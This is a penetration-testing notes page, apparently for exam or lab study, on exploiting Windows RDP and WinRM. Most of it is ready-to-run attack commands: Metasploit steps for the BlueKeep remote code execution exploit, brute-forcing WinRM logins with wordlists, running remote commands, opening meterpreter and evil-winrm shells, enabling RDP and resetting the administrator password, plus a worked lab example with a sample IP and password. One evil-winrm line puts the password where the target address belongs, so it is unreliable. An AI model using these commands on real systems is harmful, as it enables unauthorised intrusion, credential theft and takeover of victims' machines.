RDP and WinRM Exploitation

RDP and WinRM Exploitation

Navigation

Sections in This Note


Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

BLUEKEEP is the name given to an RDP vulnerability in Windows that could potentially allow an attacker to remotely execute arbitrary code and gain access to a Windows system, and consequently the network the target is part of.

Confirm RDP running on the target:

nmap -p 3389 (IPaddress)

Verify the target is vulnerable:

msfconsole
use scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS (IPaddress)
run

Exploit:

use exploit/windows/rdp/cve_2019_0708_rce
set RHOSTS (ipaddress)
show targets
set target (number)
exploit

Exploiting WinRM

Windows Remote Management (WinRM) is a Windows remote management protocol that can facilitate remote access with Windows systems over HTTP(S). Uses port 5985 and 5986 (HTTPS).

We can utilize a utility called crackmapexec to perform a brute-force on WinRM to identify users and passwords, as well as execute commands on the target system.

We can also use a Ruby script called evil-winrm to obtain a command shell session on the target system.

Brute force attack using crackmapexec:

crackmapexec winrm (IPaddress) -u (username file path) -p (password file path)

Execute commands:

crackmapexec winrm (IPaddress) -u (username) -p (password) -x "(commands)"

Using evil-winrm:

evil-winrm.rb -u (username) -p '(password)' -i (password)

Exploiting WinRM

WinRM (Windows Remote Management) is a Windows remote management protocol used to:

Typically uses TCP port 5985 and 5986 (HTTPS). Implements access control and security through various forms of authentication. We can use MSF to identify WinRM users/passwords, execute commands, and obtain a meterpreter session.

service postgresql
msfconsole
workspace -a winrm
db_nmap -sS -sV -O (IPaddress)

use auxiliary/scanner/winrm/winrm_login
set USER_FILE (location)
set PASS_FILE (location)
set RHOST (IPaddress)
run

use auxiliary/scanner/winrm/winrm_cmd
set USERNAME (uname)
set PASSWORD (password)
set CMD (command)
run

# To get a meterpreter session
use exploit/windows/winrm/winrm_script_exec
set USERNAME (uname)
set PASSWORD (password)
set FORCE_VBS true
run

Enabling RDP

RDP is a proprietary GUI remote access protocol developed by Microsoft, used to remotely connect and interact with a Windows system. Uses TCP port 3389 by default. RDP is disabled by default, but we can use an MSF exploit module to enable it. RDP authentication requires a legitimate user account and the user's clear-text password.

use post/windows/manage/enable_rdp
set SESSION (session number)
exploit

sessions 1
# (to change password: not recommended)
shell
net user administrator (new password)
# (make as background)

# To enable RDP
xfreerdp /u:administrator /p:(password) /v:(IPaddress)

External Sources


Migrated from Unsorted Notes — Other Methods

Other Methods

Brute force to get credentials in WinRM:

msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.0.0.173
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploit

Execute command on target using winrm_cmd module:

use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit

Use winrm_script_exec exploit module for a meterpreter shell:

use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit

Powered by Forestry.md